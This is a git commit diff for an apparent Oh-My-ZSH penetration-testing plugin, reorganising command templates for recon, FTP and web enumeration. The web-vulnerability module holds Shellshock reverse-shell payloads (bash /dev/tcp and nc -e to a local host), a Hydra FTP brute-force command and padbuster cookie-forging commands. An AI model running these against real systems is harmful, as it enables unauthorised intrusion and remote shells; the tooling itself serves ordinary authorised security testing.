LOT OF STUFF

stevemcilwain · Feb 13, 2020 · ea682dd · ea682dd
1 parent 5ec9ecd
commit ea682dd
Show file tree

Hide file tree

Showing 15 changed files with 378 additions and 165 deletions.
diff --git a/README.md b/README.md
@@ -9,6 +9,7 @@ Quiver is an opinionated and curated collection of commands, notes and scripts I
 * ZSH / Oh-My-ZSH shell plugin
 * Tab auto-completion
 * Prefills the command line, doesn't hide commands from you
+* Built-in logbook for on-the-fly notes, saving commands
 * Renders markdown notes to the command line
 * Runs custom scripts
 * Modular, easy updates
@@ -27,13 +28,16 @@ Clone the repo to your custom plugins folder.
 ```bash
 
 git clone https://github.com/stevemcilwain/quiver.git ~/.oh-my-zsh/custom/plugins/quiver
+cd ~/.oh-my-zsh/custom/plugins/quiver
+git config core.fileMode false
+cd -
 
 ```
 Edit ~/.zshrc to load the plugin.
 
 ```
 
-plugins=(git extract quiver)
+plugins=(git quiver)
 
 ```
 
@@ -60,18 +64,18 @@ qq-<tab>
 Quiver is organized into namespaces for easy tab navigation:
 
 * qq-util: utility functions and aliases, including self-update
+* qq-log: create, log and view a running logbook for your notes and commands
 * qq-recon:  recon commands
-* qq-enum-:  enumeration phase commands
+* qq-enum:  enumeration phase commands
 * qq-enum-network:  network scanning and enumeration commands
 * qq-enum-host:  host scanning and enumeration commands
 * qq-enum-web:  web enumeration commands
-* qq-enum-web-aws:  aws enumeration commands
 * qq-enum-dns: dns enumeration commands
 * qq-srv: service hosting commands
 
 ## Setting up Kali Linux
 
-To install dependent packages and tools run the included install script.
+To install dependent packages, data and tools run the included install script on a fresh Kali Linux installation.
 
 ```
 

diff --git a/modules/qq-aliases.zsh b/modules/qq-aliases.zsh
@@ -0,0 +1,28 @@
+#!/usr/bin/env zsh
+
+############################################################# 
+# Aliases
+#############################################################
+
+# system
+alias agu="apt-get update"
+alias aguu="apt-get update && apt-get upgrade"
+alias agi="apt-get install"
+alias agr="apt autoremove"
+alias cd..="cd ../"
+alias cls="clear"
+alias path="echo -e ${PATH//:/\\n}"
+alias cp="cp -iv"
+alias mv="mv -iv"
+alias linestocsv="paste -s -d, -"
+alias csvtolines="tr ',' '\n'"
+alias mount="mount | column -t"
+mcd () { mkdir -p "$1" && cd "$1"; }
+sfu() { cat $1 | sort -u -o $1 }
+sfip() { cat $1 | sort -u | sort -V -o $1 }
+myip() { curl icanhazip.com }
+netwatch() { watch -n 0.3 'netstat -pantlu | grep "ESTABLISHED\|LISTEN"' }
+netss() { ss -plunt }
+netls() { lsof -P -i -n }
+mem10() { ps aux | sort -rk 4,4 | head -n 10 | awk '{print $4,$11}' }
+ap() { export PATH=$PATH:$1 | tee -a ~/.zshrc && source ~/.zshrc && echo $PATH }
diff --git a/modules/qq-enum-ftp.zsh b/modules/qq-enum-ftp.zsh
@@ -0,0 +1,33 @@
+#!/usr/bin/env zsh
+
+############################################################# 
+# Enum - FTP
+#############################################################
+
+qq-enum-ftp-sweep-nmap() {
+  local s && read "s?Subnet (range): "
+  print -z "nmap -n -Pn -sS -p21 -oA ftp_sweep ${s} && \
+    grep open ftp_sweep.gnmap |cut -d' ' -f2 > sweep.${s}.txt"
+}
+
+qq-enum-ftp-tcpdump() {
+  local i && read "i?Interface: "
+  local r && read "r?RHOST: "
+  print -z "tcpdump -i ${i} host ${r} and tcp port 21 -w capture.${r}.pcap"
+}
+
+qq-enum-ftp-brute-hydra() {
+  local r && read "r?RHOST: "
+  local u && read "u?Username: "
+  print -z "hydra -l ${u} -P ${__PASS_ROCKYOU} -f ${r} ftp -V -t 15"
+}
+
+qq-enum-ftp-lftp-grep() {
+  local r && read "r?RHOST: "
+  print -z "lftp ${r}:/ > find | grep "
+}
+
+qq-enum-ftp-wget-mirror() {
+  local r && read "r?RHOST: "
+  print -z "wget --mirror ftp://anonymous:user@anon.com@${r}"
+}
diff --git a/modules/qq-enum-web-dirs.zsh b/modules/qq-enum-web-dirs.zsh
@@ -0,0 +1,64 @@
+#!/usr/bin/env zsh
+
+############################################################# 
+# Web - Dirs
+#############################################################
+
+qq-enum-web-dirs-robots() {
+  local u && read "u?Url: "
+  local d=$(echo "${u}" | cut -d/ -f3)
+  print -z "curl -s --user-agent \"${__UA}\" ${u}/robots.txt > robots.${d}.txt"
+}
+
+qq-enum-web-dirs-robots-parsero() {
+  local u && read "u?Url: "
+  local d=$(echo "${u}" | cut -d/ -f3)
+  print -z "parsero -u ${u} -o -sb > robots-parsed.${d}.txt"
+}
+
+qq-enum-web-dirs-wfuzz() {
+  local u && read "u?Url: "
+  local d=$(echo "${u}" | cut -d/ -f3)
+  print -z "wfuzz -v -s 0.1 -R5 --hc=404 -w ${__WORDS_QUICK} ${u}/FUZZ > dirs.${d}.txt "
+}
+
+qq-enum-web-files-wfuzz() {
+  local u && read "u?Url: "
+  local d=$(echo "${u}" | cut -d/ -f3)
+  print -z "wfuzz -v -s 0.1 --hc=404 -w ${__WORDS_NULL} ${u}/FUZZ > files.${d}.txt "
+}
+
+qq-enum-web-dirs-ffuf() {
+  local u && read "u?Url: "
+  local d=$(echo "${u}" | cut -d/ -f3)
+  print -z "ffuf -fc 404 -w ${__WORDS_QUICK} -u ${u}/FUZZ > dirs.${d}.txt"
+}
+
+qq-enum-web-files-ffuf() {
+  local u && read "u?Url: "
+  local d=$(echo "${u}" | cut -d/ -f3)
+  print -z "ffuf -fc 404 -w ${__WORDS_NULL} -u ${u}/FUZZ > files.${d}.txt"
+}
+
+qq-enum-web-dirs-gobuster() {
+  local u && read "u?Url: "
+  local d=$(echo "${u}" | cut -d/ -f3)
+  print -z "gobuster dir -u ${u} -a \"${__UA}\" -t10 -k -w ${__WORDS_QUICK} -o dirs.${d}.txt"
+}
+
+qq-enum-web-files-gobuster() {
+  local u && read "u?Url: "
+  local d=$(echo "${u}" | cut -d/ -f3)
+  print -z "gobuster dir -u ${u} -a \"${__UA}\" -t10 -k  -w ${__WORDS_NULL} -o files.${d}.txt"
+}
+
+qq-enum-web-dirs-dirb-recursive() {
+  local u && read "u?Url: "
+  local d=$(echo "${u}" | cut -d/ -f3)
+  print -z "dirb ${u} ${__WORDS_QUICK} -a \"${__UA}\" -z 1000 -w > dirs.${d}.txt"
+}
+
+qq-enum-web-js-endpoint-finder() {
+  local u && read "u?Url (js): "
+  print -z "python EndPoint-Finder.py -u ${u}"
+}
diff --git a/modules/qq-enum-web-vuln.zsh b/modules/qq-enum-web-vuln.zsh
@@ -0,0 +1,50 @@
+#!/usr/bin/env zsh
+
+############################################################# 
+# Web - Vuln
+#############################################################
+
+qq-enum-web-vuln-nikto() {
+  local u && read "u?Url: "
+  local d=$(echo "${u}" | cut -d/ -f3)
+  print -z "nikto -C all -useragent \"${__UA}\" -h ${u} -output nikto.${d}.log"
+}
+
+qq-enum-web-vuln-nmap-rfi() {
+  local r && read "r?Remote Host: "
+  print -z "nmap -vv -n -Pn -p80 --script http-rfi-spider --script-args http-rfi-spider.url='/' -oN web.rfi.nmap ${r}"
+}
+
+qq-enum-web-vuln-shellshock-cookie() {
+  local l && read "l?Local Host: "
+  local port && read "port?Local Port: "
+  print -z "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/${l}/${port} 0>&1"
+}
+
+qq-enum-web-vuln-shellshock-nc() {
+  local l && read "l?Local Host: "
+  local r && read "r?Remote Host: "
+  local port && read "port?Local Port: "
+  print -z "curl -A '() { :; }; /bin/bash -c \"/usr/bin/nc ${l} ${port} -e /bin/bash\"' http://${r}/cgi-bin/status"
+}
+
+qq-enum-web-vuln-put-curl() {
+  local r && read "r?Remote Host: "
+  local f && read "f?File: "
+  print -z "curl -T ${f} http://${r}/${f}"
+}
+
+qq-enum-web-vuln-padbuster-check() {
+  local r && read "r?Remote Host: "
+  local cn && read "cn?Cookie Name: "
+  local cv && read "cv?Cookie Value: "
+  print -z "padbuster ${r} ${cv} 8 -cookies ${cn}=${cv} -encoding 0"
+}
+
+qq-enum-web-vuln-padbuster-forge() {
+  local r && read "r?Remote Host: "
+  local cn && read "cn?Cookie Name: "
+  local cv && read "cv?Cookie Value: "
+  local u && read "u?Username: "
+  print -z "padbuster ${r} ${cv} 8 -cookies ${cn}=${cv} -encoding 0 -plaintext user=${u}"
+}
diff --git a/modules/qq-enum-web.zsh b/modules/qq-enum-web.zsh
@@ -34,66 +34,11 @@ qq-enum-web-scope-burp() {
 
 qq-enum-web-vhosts-gobuster() {
   local u && read "u?Url: "
-  local d=$(cat ${u} | cut -d/ -f3)
+  local d=$(echo "${u}" | cut -d/ -f3)
   print -z "gobuster vhost -u ${u} -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt \
   -a \"${__UA}\" -t20 -o vhosts.$d.txt"
 }
 
-# dirs and files
-
-qq-enum-web-dirs-robots() {
-  local u && read "u?Url: "
-  local d=$(cat ${u} | cut -d/ -f3)
-  print -z "curl -s --user-agent \"${__UA}\" ${u}/robots.txt > robots.${d}.txt"
-}
-
-qq-enum-web-dirs-robots-parsero() {
-  local u && read "u?Url: "
-  local d=$(cat ${u} | cut -d/ -f3)
-  print -z "parsero -u ${u} -o -sb > robots-parsed.${d}.txt"
-}
-
-qq-enum-web-dirs-wfuzz() {
-  local u && read "u?Url: "
-  local d=$(cat ${u} | cut -d/ -f3)
-  print -z "wfuzz -v -s 0.1 -R5 --hc=404 --hh=101 -w ${__WORDS_QUICK} ${u}/FUZZ > dirs.${d}.txt "
-}
-
-qq-enum-web-files-wfuzz() {
-  local u && read "u?Url: "
-  local d=$(cat ${u} | cut -d/ -f3)
-  print -z "wfuzz -v -s 0.1 --hc=404 --hh=101 -w ${__WORDS_NULL} ${u}/FUZZ > files.${d}.txt "
-}
-
-qq-enum-web-dirs-ffuf() {
-  local u && read "u?Url: "
-  local d=$(cat ${u} | cut -d/ -f3)
-  print -z "ffuf  -fc 404 -fs 101 -w ${__WORDS_QUICK} -u ${u}/FUZZ > dirs.${d}.txt"
-}
-
-qq-enum-web-files-ffuf() {
-  local u && read "u?Url: "
-  local d=$(cat ${u} | cut -d/ -f3)
-  print -z "ffuf -fc 404 -fs 101 -w ${__WORDS_NULL} -u ${u}/FUZZ > files.${d}.txt"
-}
-
-qq-enum-web-dirs-gobuster() {
-  local u && read "u?Url: "
-  local d=$(cat ${u} | cut -d/ -f3)
-  print -z "gobuster dir -u ${u} -a \"${__UA}\" -t10 -k -w ${__WORDS_QUICK} -o dirs.${d}.txt"
-}
-
-qq-enum-web-files-gobuster() {
-  local u && read "u?Url: "
-  local d=$(cat ${u} | cut -d/ -f3)
-  print -z "gobuster dir -u ${u} -a \"${__UA}\" -t10 -k  -w ${__WORDS_NULL} -o files.${d}.txt"
-}
-
-qq-enum-web-js-endpoint-finder() {
-  local u && read "u?Url (js): "
-  print -z "python EndPoint-Finder.py -u ${u}"
-}
-
 # fuzz
 
 qq-enum-web-fuzz-post-json-ffuf() {
@@ -110,58 +55,14 @@ qq-enum-web-screens-eyewitness() {
   print -z "eyewitness.py --web -f ${f} -d ./${d} --user-agent \"${__UA}\" "
 }
 
-# vuln scanners
-
-qq-enum-web-vuln-nikto() {
-  local u && read "u?Url: "
-  local d=$(cat ${u} | cut -d/ -f3)
-  print -z "nikto -C all -useragent \"${__UA}\" -h ${u} -output nikto.${d}.log"
-}
-
-qq-enum-web-vuln-nmap-rfi() {
-  local r && read "r?Remote Host: "
-  print -z "nmap -vv -n -Pn -p80 --script http-rfi-spider --script-args http-rfi-spider.url='/' -oN web.rfi.nmap ${r}"
-}
-
-qq-enum-web-vuln-shellshock-cookie() {
-  local l && read "l?Local Host: "
-  local port && read "port?Local Port: "
-  print -z "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/${l}/${port} 0>&1"
-}
 
-qq-enum-web-vuln-shellshock-nc() {
-  local l && read "l?Local Host: "
-  local r && read "r?Remote Host: "
-  local port && read "port?Local Port: "
-  print -z "curl -A '() { :; }; /bin/bash -c \"/usr/bin/nc ${l} ${port} -e /bin/bash\"' http://${r}/cgi-bin/status"
-}
-
-qq-enum-web-vuln-put-curl() {
-  local r && read "r?Remote Host: "
-  local f && read "f?File: "
-  print -z "curl -T ${f} http://${r}/${f}"
-}
-
-qq-enum-web-vuln-padbuster-check() {
-  local r && read "r?Remote Host: "
-  local cn && read "cn?Cookie Name: "
-  local cv && read "cv?Cookie Value: "
-  print -z "padbuster ${r} ${cv} 8 -cookies ${cn}=${cv} -encoding 0"
-}
-
-qq-enum-web-vuln-padbuster-forge() {
-  local r && read "r?Remote Host: "
-  local cn && read "cn?Cookie Name: "
-  local cv && read "cv?Cookie Value: "
-  local u && read "u?Username: "
-  print -z "padbuster ${r} ${cv} 8 -cookies ${cn}=${cv} -encoding 0 -plaintext user=${u}"
-}
 
 # apps
 
 qq-enum-web-app-wordpress() {
   local u && read "u?Url: "
-  print -z "wpscan --url ${u} --enumerate tt,vt,u,vp"
+   local d=$(echo "${u}" | cut -d/ -f3)
+  print -z "wpscan --url ${u} --enumerate tt,vt,u,vp > wp.${d}.txt"
 }
 
 # elastic search

diff --git a/modules/qq-recon-domains.zsh b/modules/qq-recon-domains.zsh
@@ -22,4 +22,4 @@ qq-recon-domains-by-crt.sh() {
 qq-recon-domains-by-brute-ffuf() {
   local d && read "domain?Domain: "
   print -z "ffuf -u FUZZ.${d} -w ${__WORDS_ALL} -v | grep \"| URL | \" | awk '{print \$4}'"
-}
+}